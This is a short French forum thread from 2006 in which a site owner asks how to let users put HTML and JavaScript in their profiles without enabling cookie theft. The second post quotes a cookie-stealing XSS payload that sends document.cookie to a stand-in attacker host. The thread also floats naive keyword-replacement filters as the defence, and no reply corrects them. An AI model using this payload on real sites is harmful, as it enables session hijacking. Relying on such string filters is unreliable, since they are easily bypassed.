Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1443 connectés 

  FORUM HardWare.fr
  Programmation
  HTML/CSS

  sécuritée du html sur site distant et vol de cookie

 



 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

sécuritée du html sur site distant et vol de cookie

n°1408924
scull
MySCULL cay bon mangez en!
Posté le 18-07-2006 à 23:06:17  profilanswer
 

Bonjour à tous.
 
Je voudrais proposer prochainement aux utilisateurs de mon site de pouvoir mettre du html et javascript dans leurs profil.
Mème si ce sont des personnes "normales" qui n'iront pas sabotez leur propre page à coups de alert(lol);, d'autres personnes pourraient elles ètre tenté de piquer les mots de passe.
 
Je me demandais si le simple fait d'utiliser un str_replace de "cookie" en "cook!e" pourrait bloquer ces tentatives ?
Je sais que c'est bien crade, mais quel fonction laisse le javascript et empèche le vol de cookies ?  [:barthaliastoxik]  
 
D'ailleur si l'un d'entre vous à plus d'infos sur le vol de cookie, n'hésitez pas à faire tourner le lien.
Merci


Message édité par scull le 18-07-2006 à 23:06:47
mood
Publicité
Posté le 18-07-2006 à 23:06:17  profilanswer
 

n°1408946
scull
MySCULL cay bon mangez en!
Posté le 18-07-2006 à 23:20:27  profilanswer
 

Visiblement le vol de cookie ce fait avec ce genre de commande :

Code :
  1. <img src="javascript:var ima=new Image(); ima.src=' htp://site_du_pirate.com/recup.php?cookie='+document.cookie">


 
Donc si je bannis le mot "document.cookie", il n'est plus possible de copier les cookies ? Confirmation ?


Message édité par scull le 18-07-2006 à 23:21:41

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  HTML/CSS

  sécuritée du html sur site distant et vol de cookie

 

Sujets relatifs
cherche un site d'aide pour fichier .batSite aux normes?
creer un bouton en htmlMon texte dépasse des cadres, que modifier dans le code html ?
Impression pages htmlDimension automatique du site
probleme sur mon site...video html
nbr de site perso possible chez FreeCe qu'implique de choisir le XHTLM par rapport au HTML
Plus de sujets relatifs à : sécuritée du html sur site distant et vol de cookie


Copyright © 1997-2018 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR